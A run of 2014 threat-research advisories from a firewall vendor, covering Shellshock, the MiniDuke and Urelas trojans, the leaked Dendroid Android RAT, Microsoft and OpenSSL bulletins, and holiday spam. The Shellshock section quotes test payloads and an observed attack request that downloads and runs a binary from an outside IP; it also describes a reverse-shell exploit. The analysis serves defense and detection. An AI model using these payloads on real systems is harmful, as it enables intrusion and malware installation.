GNU Bash Code Injection Vulnerability CVE-2014-6271 (Sept 25, 2014)

Researchers have discovered a critical arbitrary code execution vulnerability in GNU Bash through version 4.3. This vulnerability involves various widely-used applications including ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, etc.

The Dell SonicWALL Threat Research Team has created and released IPS signatures for its line of next-generation firewalls and its Web Application Firewall (WAF) module on the SMB SRA product line. These signatures were released on Sept 24, 2014, the same day the vulnerability was publicly disclosed.

Firewall Appliance Signature:

  • 10529 GNU Bash Code Injection Vulnerability (CVE-2014-6271) 1
  • 5603 GNU Bash Code Injection Vulnerability (CVE-2014-6271) 2
  • 5605 GNU Bash Code Injection Vulnerability (CVE-2014-6271) 3
  • 5661 GNU Bash Code Injection Vulnerability (CVE-2014-7169) 1

Web Application Firewall on the SMB SRA Series Signature:

  • 1603 Bash Code Injection

Dell SonicWALL has researched the vulnerability and release additional signatures. The following is the analysis of the vulnerability.

Vulnerability Diagnostic

  1. To identify the vulnerability, please check the version of bash shell. For example, run the following command under Ubuntu, Bash version 4.2.24 and priors are vulnerable:
  2. To confirm the vulnerability, please test with following command:
  3. env x='() { :;}; echo vulnerable' bash -c 'echo this is a test'

    The vulnerable version will generate the following results:

  4. Apply the patch for CVE-2014-6271 in various platform:
  5. Command for applying the patch on Ubuntu:

    sudo apt-get update && sudo apt-get install bash

    Command for applying the patch on Red Hat Enterprise Linux:

    yum update bash

    For Arch Linux

    pacman -Syu
  6. The following figure shows the patched version 4.2.25:
  7. Test against patched version with the script in step 2 will generate the following results:

Patch Code Analysis

The following code snippets released on 2014-09-25 12:45:07 (GMT) shows the patch for CVE-2014-6271.

Two new flag bits SEVAL_FUNCDEF and SEVAL_ONECMD were added:

The new flag bits are set when initializing shell variables:

If the flags are set, the execution process will be broken.

Note that the patch for CVE-2014-6271 is incomplete. A new CVE ID CVE-2014-7169 was created for it, and the patch is still under development. The following command tests the new vulnerability CVE-2014-7169:

env X='() { (a)=>' sh -c "echo date"; cat echo

Test Case Example

There are multiple scenarios to apply the attacks address the vulnerability. Here is the list includes most likely affected applications:

  • Apache with CGI Module enabled (Httpd)
  • SecureShell (SSH)
  • Dhclient
  • CUPS

Among them, Apache with CGI Module enabled are most targeted. An attacker can simply send out a well-crafted HTTP request to Apache server with CGI scripts parsed by vulnerable bash shell to acquire the full access of the target server under the web server user permission. The following figure shows the python script:

By running this script against the target vulnerable Apache server, a reverse shell can be built, which full access under www-data user’s permission is granted, for example, show all the users (/etc/passwd) in the system:

As a follow-up to our coverage of Shellshock, CVE-2014-6271, attackers appear to have rapidly developed automated exploit scripts to find vulnerable Linux servers and deliver a new ELF malware. A typical method to deliver malware is:

 GET./.HTTP/1.0 .User-Agent:.Thanks-Rob .Cookie:().{.:;.};.wget.-O./tmp/besh.http://162.253.66.76/nginx;.chmod.777./tmp/besh;./tmp/besh; .Host:().{.:;.};.wget.-O./tmp/besh.http://162.253.66.76/nginx;.chmod.777./tmp/besh;./tmp/besh; .Referer:().{.:;.};.wget.-O./tmp/besh.http://162.253.66.76/nginx;.chmod.777./tmp/besh;./tmp/besh; .Accept:.*/* 

A detailed analysis of the malware infection cycle can be found here.

This article has been updated on Sept 26, 2014. Dell SonicWALL will continue to monitor the vulnerability, telemetry data and release additional information as needed. For ongoing updates and additional information, check the SonicALERT website.

Bash Code Injection Vulnerabilities Update (Oct 3, 2014)

More GNU Bash vulnerabilities have been disclosed since Sep 25, 2014 and Dell SonicWALL keeps monitoring the Internet and analyzing the vulnerabilities.
Here’s the latest coverage of GNU Bash Code Injection Vulnerabilities:

    CVE-2014-6271

    • IPS sid:10529 “GNU Bash Code Injection Vulnerability (CVE-2014-6271) 1”
    • IPS sid:5603 “GNU Bash Code Injection Vulnerability (CVE-2014-6271) 2”
    • IPS sid:5605 “GNU Bash Code Injection Vulnerability (CVE-2014-6271) 3”
    CVE-2014-6277

    • IPS sid:5667 “GNU Bash Code Injection Vulnerability (CVE-2014-6277, CVE-2014-7186) 1”
    CVE-2014-6278

    • IPS sid:5661 “GNU Bash Code Injection Vulnerability (CVE-2014-6278, CVE-2014-7169) 1”
    CVE-2014-7169

    • IPS sid:5661 “GNU Bash Code Injection Vulnerability (CVE-2014-6278, CVE-2014-7169) 1”
    CVE-2014-7186

    • IPS sid:5667 “GNU Bash Code Injection Vulnerability (CVE-2014-6277, CVE-2014-7186) 1”
    CVE-2014-7187

    • IPS sid:5669 “GNU Bash Code Injection Vulnerability (CVE-2014-7187) 1”

Dell SonicWALL also observed millions of attack attempts during last 9 days, shown below:

The number reaches its peak on Sep 29 then start decreasing. We expect the number keeps dropping to a certain level then remains steady.

MiniDuke: Multi Component info-stealer spreads via Social Engineering

MiniDuke: Multi Component info-stealer spreads via Social Engineering

The Dell Sonicwall Threats Research team observed reports of a new multi component bot family named Mini Duke actively spreading in the wild.

These variations have been seen as far back as July 2012 and continue to operate as of September 2014.

Mini Duke steals various data from the infected computer and sends out to a Command & Control server. The stolen data include passwords stored by various Web browsers, Email clients, Instant Messengers, and other applications. The malware also performs key logging, takes screen shots, and steals clipboard data. It may create a scheduled task and a service in order to get started after system reboots.

Infection Cycle:

The Trojan uses the following icons:

Md5: dc6cc442c0900104a5601a6049354fad

The Trojan adds the following file to the file system:

C:Program FilesCommon FilesMicrosoft Sharedynqyyv.exe [Detected as W32/Miniduke .A]

C:WINDOWSsystem32usbnet.exe and %Userprofile%Application DataAdobesyscmvk.exe

%Userprofile% Local SettingsTempynqyyv.dll and C:Program FilesCommon FilesMicrosoft Sharedynqyyv.dll [DLL Module ]

The Trojan adds the following key to the Windows registry to ensure persistence upon reboot:

%Userprofile% Local SettingsTemp ynqyyvreg.reg [Create a Startup Service)

The malware infections starts by Social Engineering victims into opening either a Windows executable file with a fake name making it look like a document/image file, or a PDF file that contains an exploit. Here is an Example of Fake Doc File.

Once the victim opens the file, the malware starts information gathering. The data collection components found in the malware include a keylogger, clipboard stealer, screen Shot, and password stealers for a variety of popular chat, email and web browsing programs. Once the information has been collected, it is sent out to remote servers using FTP.

Rundll32.exe injected by miniduke to copy all its own components on the target system.

The Malware Create two processes usbsrv.exe and syscmvk.exe in C:WINDOWSsystem32usbsrv.exe and %Userprofile%Application DataAdobesyscmvk.exe

All these processes has Copyright(C) NVIDIA Corporation. All rights reserved fake file properties.

The usbsrv.exe registered as Watchmon Service job in Task Scheduler Service and in following key to the Windows registry HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun

The syscmvk.exe tries to run these commands on command shell

KeyLogger and Info Stealer

Mini Duke has the Key logger function, it uses GetKeyState and GetKeyboardState to capture the pressed keys on target system Key logging is skipped if one of the following Anti-Virus process is running on infected system:

Here is an Example for Key logger and clipboard data

Mini duke searches the hard drives and network drives for files that match any of the below patterns:

And also it will ignore if patterns files be such as following list:

  • *.exe;
  • *.ndb;
  • *.mp3;

Info Stealer Component:
The malware has the capability to targets the following software:

For example Mini Duke steals Skype login MD5 and then attacker can obtain victims Skype username and password by using a brute-force the MD5 or for other instant messengers could decrypts the hash Algorithms.

It has been observed that the malware had other stealing functionalities that targeted applications such as Chrome, Firefox and Internet Explorer, amongst other things also retrieve / Grabbing List of web logins such as following list:

The malware is to attempt create a file in C:Documents and SettingsAll UsersDocuments folder that follows this format:

ntuser{4CB43D7F-7EEE-4906-8698-<8 Hexadecimal numbers>.pol

Here is an Example of Encrypted data

HTTP POST to Command and Control (C&C)

Mini Duke has the C&C communication over HTTP. Uses HTTP POST requests to one or more statically defined URLs are made on a regular basis. These POST requests such as the following fields in this order:

  • m or mgn
  • Auth
  • Session
  • DataID
  • FamilyID
  • BranchID
  • VolumeID
  • User
  • Query

The first field does not have any value and Auth is the sample ID, this is same 8-character hex digit that can be found in the PDB path such as c:botgenstudiogenerations8f1777b0binBot.pdb

The value of Query depends on the request. The string which is Base64 encoded/RC4 encrypted, the string is composed of a 256-character string that is repeated seven times.

Rundll32.exe injected by Malware and its transfer Malware traffic to C&C Servers.

The C&C Servers are listed but not limited here also mini duke uses FTP server for File Transfer via following IPs & User name

SonicWALL Gateway AntiVirus provides protection against this threat via the following signatures:

  • GAV: MiniDuke.A (Trojan)

Microsoft Security Bulletin Coverage (September 09, 2014)

Dell SonicWALL has analyzed and addressed Microsoft’s security advisories for the month of September, 2014. A list of issues reported, along with Dell SonicWALL coverage information are as follows:

MS14-052 Cumulative Security Update for Internet Explorer (2977629)

  • CVE-2013-7331 Internet Explorer Resource Information Disclosure Vulnerability
    There are no known exploits in the wild.
  • CVE-2014-2799 Internet Explorer Memory Corruption Vulnerability
    IPS:5454 “Internet Explorer Memory Corruption Vulnerability (MS14-052) 14”
  • CVE-2014-4059 Internet Explorer Memory Corruption Vulnerability
    There are no known exploits in the wild.
  • CVE-2014-4065 Internet Explorer Memory Corruption Vulnerability
    IPS:5413 “Internet Explorer Memory Corruption Vulnerability (MS14-052) 13”
  • CVE-2014-4079 Internet Explorer Memory Corruption Vulnerability
    There are no known exploits in the wild.
  • CVE-2014-4080 Internet Explorer Memory Corruption Vulnerability
    IPS:5410 “Internet Explorer Memory Corruption Vulnerability (MS14-052) 12”
  • CVE-2014-4081 Internet Explorer Memory Corruption Vulnerability
    IPS:5397 “Internet Explorer Memory Corruption Vulnerability (MS14-052) 11”
  • CVE-2014-4082 Internet Explorer Memory Corruption Vulnerability
    IPS:5385 “Internet Explorer Memory Corruption Vulnerability (MS14-052) 10”
  • CVE-2014-4083 Internet Explorer Memory Corruption Vulnerability
    There are no known exploits in the wild.
  • CVE-2014-4084 Internet Explorer Memory Corruption Vulnerability
    IPS:5367 “Internet Explorer Memory Corruption Vulnerability (MS14-052) 9”
  • CVE-2014-4085 Internet Explorer Memory Corruption Vulnerability
    There are no known exploits in the wild.
  • CVE-2014-4086 Internet Explorer Memory Corruption Vulnerability
    IPS:5365 “Internet Explorer Memory Corruption Vulnerability (MS14-052) 8”
  • CVE-2014-4087 Internet Explorer Memory Corruption Vulnerability
    IPS:5355 “Internet Explorer Memory Corruption Vulnerability (MS14-052) 7”
  • CVE-2014-4088 Internet Explorer Memory Corruption Vulnerability
    IPS:5351 “Internet Explorer Memory Corruption Vulnerability (MS14-052) 6”
  • CVE-2014-4089 Internet Explorer Memory Corruption Vulnerability
    IPS:5338 “Internet Explorer Memory Corruption Vulnerability (MS14-052) 5”
  • CVE-2014-4090 Internet Explorer Memory Corruption Vulnerability
    There are no known exploits in the wild.
  • CVE-2014-4091 Internet Explorer Memory Corruption Vulnerability
    There are no known exploits in the wild.
  • CVE-2014-4092 Internet Explorer Memory Corruption Vulnerability
    IPS:5336 “Internet Explorer Memory Corruption Vulnerability (MS14-052) 4”
    IPS:5327 “Internet Explorer Memory Corruption Vulnerability (MS14-052) 3”
  • CVE-2014-4093 Internet Explorer Memory Corruption Vulnerability
    There are no known exploits in the wild.
  • CVE-2014-4094 Internet Explorer Memory Corruption Vulnerability
    IPS:5326 “Internet Explorer Memory Corruption Vulnerability (MS14-052) 2”
  • CVE-2014-4095 Internet Explorer Memory Corruption Vulnerability
    IPS:5323 “Internet Explorer Memory Corruption Vulnerability (MS14-052) 1 “
  • CVE-2014-4096 Internet Explorer Memory Corruption Vulnerability
    There are no known exploits in the wild.
  • CVE-2014-4097 Internet Explorer Memory Corruption Vulnerability
    There are no known exploits in the wild.
  • CVE-2014-4098 Internet Explorer Memory Corruption Vulnerability
    There are no known exploits in the wild.
  • CVE-2014-4099 Internet Explorer Memory Corruption Vulnerability
    There are no known exploits in the wild.
  • CVE-2014-4100 Internet Explorer Memory Corruption Vulnerability
    There are no known exploits in the wild.
  • CVE-2014-4101 Internet Explorer Memory Corruption Vulnerability
    There are no known exploits in the wild.
  • CVE-2014-4102 Internet Explorer Memory Corruption Vulnerability
    There are no known exploits in the wild.
  • CVE-2014-4103 Internet Explorer Memory Corruption Vulnerability
    There are no known exploits in the wild.
  • CVE-2014-4104 Internet Explorer Memory Corruption Vulnerability
    There are no known exploits in the wild.
  • CVE-2014-4105 Internet Explorer Memory Corruption Vulnerability
    There are no known exploits in the wild.
  • CVE-2014-4106 Internet Explorer Memory Corruption Vulnerability
    There are no known exploits in the wild.
  • CVE-2014-4107 Internet Explorer Memory Corruption Vulnerability
    There are no known exploits in the wi
    ld.

  • CVE-2014-4108 Internet Explorer Memory Corruption Vulnerability
    There are no known exploits in the wild.
  • CVE-2014-4109 Internet Explorer Memory Corruption Vulnerability
    There are no known exploits in the wild.
  • CVE-2014-4110 Internet Explorer Memory Corruption Vulnerability
    There are no known exploits in the wild.
  • CVE-2014-4111 Internet Explorer Memory Corruption Vulnerability
    There are no known exploits in the wild.

MS14-053 Vulnerability in .NET Framework Could Allow Denial of Service (2990931)

  • CVE-2014-4072 .NET Framework Denial of Service Vulnerability
    There are no known exploits in the wild.

MS14-054 Vulnerability in Windows Task Scheduler Could Allow Elevation of Privilege (2988948)

  • CVE-2014-4074 Task Scheduler Vulnerability
    There are no known exploits in the wild.

MS14-055 Vulnerabilities in Microsoft Lync Server Could Allow Denial of Service (2990928)

  • CVE-2014-4068 Lync Denial of Service Vulnerability
    There are no known exploits in the wild.
  • CVE-2014-4070 Lync XSS Information Disclosure Vulnerability
    There are no known exploits in the wild.
  • CVE-2014-4071 Lync Denial of Service Vulnerability
    There are no known exploits in the wild.

Microsoft IE Vulnerability (CVE-2014-1815) attacks spotted in the Wild (September 05, 2014)

The CVE-2014-1815 vulnerability exploit is spotted in the wild. Following is the detailed analysis:

The attacker entices the user to visit the specially crafted webpage. If the user has an older un-patched version of Internet Explorer, the attacker is able to execute code in user’s context and also crash IE.

The crash code looks like

The jscript is trying to access the freed marquee object. This leads to use after free condition which causes internet explorer to crash. The attacker is able to control the memory location EAX+70h

Data at memory address in ECX

Stack trace looks like

The attacker is able to download/execute suspicious file storm.swf under the user’s security context.

Dell Sonicwall Threat research team has implement following signature to prevent this attack

  • IPS 3869: Internet Explorer Memory Corruption Vulnerability (MS14-029) 2
  • Spam campaign roundup: The Labor Day Edition (Aug 29, 2014)

    Labor Day weekend is just around the corner. It is a holiday which pays tribute to hardworking Americans and is celebrated on the first Monday in September. This day also unofficially marks the end of summer and is also one of the best times to go shopping. With the slew of sales launching this weekend and consumers looking to stock up on discounted items, cyber criminals are also gearing up to prey on online shoppers. We have rounded up what you should watch out for so you can protect your web activities when shopping online.

    Over the last week, the Dell SonicWALL threats research team has been following all Labor Day related spam emails.

    As the weekend approaches, we observed an increasing amount of holiday related spam emails. These emails have a common theme of trying to lure consumers to click on the links, requesting immediate action and provide their personal information in exchange for access to amazing deals and deep discounts. Below are some of the most common email subjects:

    • Ray Ban Online!! Labor Day Discount Price!! 90% OFF! Hurry!
    • Last chance to activate your $25 SEARS gift before Labor Day Sale
    • 1k Home Depot Card (Labor Day Savings)
    • All auto makes reduced, Labor Day Blowout
    • Lots must clear before Labor Day
    • Hurry activate your Lowes Gift Card before the Labor Day Sale Event

    Some of these emails are purporting to come from department stores with promises of free gift cards. Clicking the links on the email body will typically lead the user to an affiliate website and will then be asked to enter their personal information and to participate in a number of offers.

    It is important to remember that these offers often cost money in fees or subscriptions without the guarantee of ever receiving the products and services or the free gift card at the end of the process.

    We urge our users to always be vigilant and cautious with any unsolicited email and to avoid providing any personal information, particularly if you are not certain of the source.

    Dell SonicWALL Gateway Antivirus and Email Security service constantly monitor and provide protection against such malicious spam and phishing threats.

    Source Code leaks for Android RAT Dendroid (Aug 29, 2014)

    Remote Administration Tools (RAT) are quiet common on the Windows platform in the current age but they are a rarity for the Mobile platform. AndroRat is one of the first reported RAT for Android, the next RAT that made news was Dendroid which was first reported in March 2014 and came with a price tag of $300 in underground sites. It gained popularity in a short time owing to its long list of features, but recently it has been making waves again after its source code leaked on GitHub. Dell SonicWALL Threats Research Team obtained a copy of the Dendroid Source Code and in this post we have highlighted some observations from our analysis of this threat.

    The leaked code consists of:

    • APK Binder
    • Dendroid APK
    • Dendroid Panel

    APK Binder

    The binder can be used to fuse a legitimate Android app with the malicious Dendroid app. This modified app can then be used to propagate Dendroid to unsuspecting victims

    Dendroid APK

    This apk acts as the payload for the RAT. It has capabilities to execute a wide range of commands, some of them are as follows:

    • Media volume up/down
    • Ringer volume up/down
    • Screen On
    • Record Calls
    • Block SMS
    • Record Audio
    • Take Video
    • Take Photo
    • Send Text
    • Send Contacts
    • Get user accounts
    • Call Number
    • Delete Call Logs
    • Open Webpage
    • Update the app
    • Delete Files ( audio, video, pictures, calls )
    • Get Browser History
    • Get Browser Bookmarks
    • Get Call History
    • Open Dialog Box
    • Get Inbox SMS
    • HTTP flood

    Dendroid Panel

    This is the information console where the attacker can view all the details about his bots, issue commands to them and view results of these commands:

    Infection Cycle

    The Dendroid apk goes by the package name com.hidden.droidian and requests for the following permissions during installation:

    • QuickBoot PowerON
    • Internet
    • Access Fine Location
    • Get Tasks
    • Wake Lock
    • Call Phone
    • Write Settings
    • Read Phone State
    • Write External Storage
    • Camera
    • Read SMS
    • Write SMS
    • Send SMS
    • Receive SMS
    • Get Accounts
    • Read History Bookmarks
    • Access Network State
    • Read Contacts
    • Record Audio
    • Process Outgoing Calls

    Once installed it appears in the appdrawer with an Adobe Flash icon. In the recent past there have been a number of Android malwares using the Adobe Flash icon, this one follows suit. Upon clicking the app nothing noticeable happens apart from the icon disappearing from the app drawer, but the app continues to run in the background through its Services:

    The app has the following Services that run in the background:

    • RecordService
    • DroidianService

    Droidian Service contains major bulk of the functions present in the malicious app. In addition, it contains details like URL which the Trojan should communicate with, the database password and other configuration options that can be set from the Panel.

    Once this service starts it begins gathering information about the device and informs the attacker about successful infection. The following information is sent to the attacker via a get.php GET packet:

    • UID – Used to identify the device
    • Service provider
    • Phone number
    • GPS Co-ordinates that display the location of the device on a small worldmap
    • Device Model
    • SDK Version Information
    • Database Password

    Once this packet is received by the server, the attacker is able to see an entry in his Dendroid Panel for this infected device. He can then choose from a large arsenal of commands instructing what he wants to do on the victim device. The commands selected by him get queued in the panel, the malicious apk polls the server for a list of commands whenever the receiver ServiceReceiver gets triggered.

    ServiceReceiver gets triggered for the following system events:

    • Boot Completed
    • SMS Received
    • Phone State
    • Action External Applications Available
    • Quickboot PowerON

    ServiceReceiver in turn checks and starts DroidianService if it is not already running, DroidianService then sends the get.php mentioned earlier and checks if there are any commands issued by sending get-functions.php

    Once the command is executed on the device the malicious app informs the server about the successful execution via message.php. In the below example we initated the “Screen On” command on the Panel and when the device screen was turned on we observed a TCP packet being sent from the device stating “Screen On Complete”

    After the source code leak there are a couple of things happening with regards to Dendroid:

    • Security Researchers are analyzing and understanding this tool to strengthen protection against this threat. Some researchers have identified critical vulnerabilities in the Dendroid Panel highlighting loopholes towards Input Validation
    • Malware writers are using and modifying the dendroid code to further improve/create new threats. There is already a modified APK Binder in the works and the author claims that he is working on a “new dendroid remake”

    We can expect to see more Android RATs that get spawned off Dendroid code/architecture in the near future. As always be careful about where you download apps for your Android device and check the permissions that the app requests during installation and make an informed decision.

    Dell SonicWALL Gateway AntiVirus provides protection against this threat via the following signatures:

    • GAV: AndroidOS.Dendroid.EXP (Trojan)
    • GAV: Dendroid.Binder (Trojan)

    New OpenSSL Vulnerabilities (Aug 29, 2014)

    The security industry starts putting more resources reviewing the source code of OpenSSL project when the infamous HeartBleed bug was disclosed. Since then several new vulnerabilities are discovered and OpenSSL has released patches for them. These operations would make the Internet more secure if everyone adopts the latest OpenSSL libraries as soon as they become available. Dell SonicWALL keeps monitoring OpenSSL related news and reacts immediately; following are some incidents:

    CVE-2014-3470 The ssl3_send_client_key_exchange function in s3_clnt.c in OpenSSL, when an anonymous ECDH cipher suite is used, allows remote attackers to cause a denial of service (NULL pointer dereference and client crash) by triggering a NULL certificate value.

    Related signature(s):

    • 4790 OpenSSL Anonymous ECDH DoS 1
    • 4822 OpenSSL Anonymous ECDH DoS 2

    CVE-2014-3506 d1_both.c in the DTLS implementation in OpenSSL allows remote attackers to cause a denial of service (memory consumption) via crafted DTLS handshake messages that trigger memory allocations corresponding to large length values.

    Related signature(s):

    • 5210 OpenSSL DTLS handshake DoS

    CVE-2014-3507 Memory leak in d1_both.c in the DTLS implementation in OpenSSL allows remote attackers to cause a denial of service (memory consumption) via zero-length DTLS fragments that trigger improper handling of the return value of a certain insert function.

    Related signature(s):

    • 5127 OpenSSL DTLS Zero-Length Fragments DoS

    CVE-2014-3512 Multiple buffer overflows in crypto/srp/srp_lib.c in the SRP implementation in OpenSSL allow remote attackers to cause a denial of service (application crash) or possibly have unspecified other impact via an invalid SRP (1) g, (2) A, or (3) B parameter.

    Related signature(s):

    • 5211 OpenSSL Invalid SRP Parameters Buffer Overflow

    Samba nmbd unstrcpy Buffer Overflow (Aug 22, 2014)

    Samba, which runs on most Unix and Unix-like systems, is a free software re-implementation of the SMB/CIFS networking protocol. Samba provides file and print services for various Microsoft Windows clients and can integrate with a Windows Server domain.

    SMB/CIFS runs on top of NetBIOS, which provides three distinct services: Name service (NetBIOS-NS), Datagram distribution service (NetBIOS-DGM) and Session service (NetBIOS-SSN). Samba implements the NetBIOS-NS protocol using the “nmbd” daemon.

    A heap buffer overflow vulnerability exists in Samba’s nmbd daemon. Specifically, the vulnerability is due to “sizeof” operation on an incorrect variable in the “unstrcpy” macro. A remote attacker can exploit this vulnerability by sending crafted requests to the target Samba server. Successful exploitation would cause arbitrary code execution or result in denial-of-service condition.

    The vulnerability has been assigned as CVE-2014-3560.

    Dell SonicWALL has released an IPS signature to detect and block specific exploitation attempts targeting this vulnerability. The signature is listed below:

    • 5082 Samba nmbd unstrcpy Buffer Overflow

    Urelas spy Trojan drops multiple malware families (Aug 22nd, 2014)

    The Dell Sonicwall Threats Research team has received reports of a recent variant of the Urelas Trojan. This Trojan is known for its spying capability and has the ability to monitor certain gaming applications. It also sends screenshots and other system information to a remote C&C server. It can also download and install malware from other families.

    Infection Cycle:

    The Trojan uses the following icon:

    The Trojan adds the following files to the filesystem:

    • %USERPROFILE%Local SettingsTempgolfinfo.ini
    • %USERPROFILE%Local SettingsTempsanfdr.bat (cleanup script)
    • %USERPROFILE%Local SettingsTempjiokf.exe [Detected as GAV: Packman.0 (Trojan)]
    • %USERPROFILE%Local SettingsTemppoetr.exe (copy of original) [Detected as GAV: Urelas.AB_3 (Trojan)]
    • %SYSTEM32%d3d8caps.dat [Detected as GAV: Urelas.AB_3#enc (Trojan)]
    • %SYSTEM32%d3d9caps.dat [Detected as GAV: Urelas.AB_3#enc (Trojan)]
    • %SYSTEM32%pokdre.exe [Detected as GAV: Beaugrit.A_15 (Trojan)]

    The Trojan adds the following keys to the Windows registry:

    • HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesspoetrDEBUG Trace Level “”
    • HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesspokdreDEBUG Trace Level “”
    • HKEY_CURRENT_USERSoftwareMicrosoftWindows NTCurrentVersionWindows Run “%SYSTEM32%pokdre.exe”
    • HKEY_CURRENT_USERSoftwareMicrosoftWindows NTCurrentVersionWindows TrayKey “jiokf”

    The .bat file dropped by pokdre.exe contains the following script to clean up traces of the infection:

        :Repeat
        del "{rundir}pokdre.exe"
        if exist "{rundir}pokdre.exe" goto Repeat
        rmdir "{rundir}"
        del "%USERPROFILE%Local SettingsTempsanfdr.bat"

    The Trojan was observed engaging in the following encrypted communication with a remote C&C server. All communication is tagged with the AS101 string:

    The Trojan was later seen requesting and downloading an additional malicious executable file (pokdre.exe) [Detected as GAV: Beaugrit.A_15 (Trojan)]:

    golfinfo.ini contains the following encrypted data:

    This data was seen being sent from the C&C server. The .dat files d3d8caps.dat and d3d9caps.dat contain decrypted data that was sent from the C&C server.

    During analysis we were able to identify a very basic decryption routine which simply uses the NOT operator for decryption:

    Using the above knowledge we were able to fully decrypt golfinfo.ini thus revealing 2 C&C server ip addresses and infection filenames:

    SonicWALL Gateway AntiVirus provides protection against this threat via the following signatures:

    • GAV: Packman.0 (Trojan)
    • GAV: Urelas.AB_3 (Trojan)
    • GAV: Virut.Q.gen (Trojan)
    • GAV: Beaugrit.A_15 (Trojan)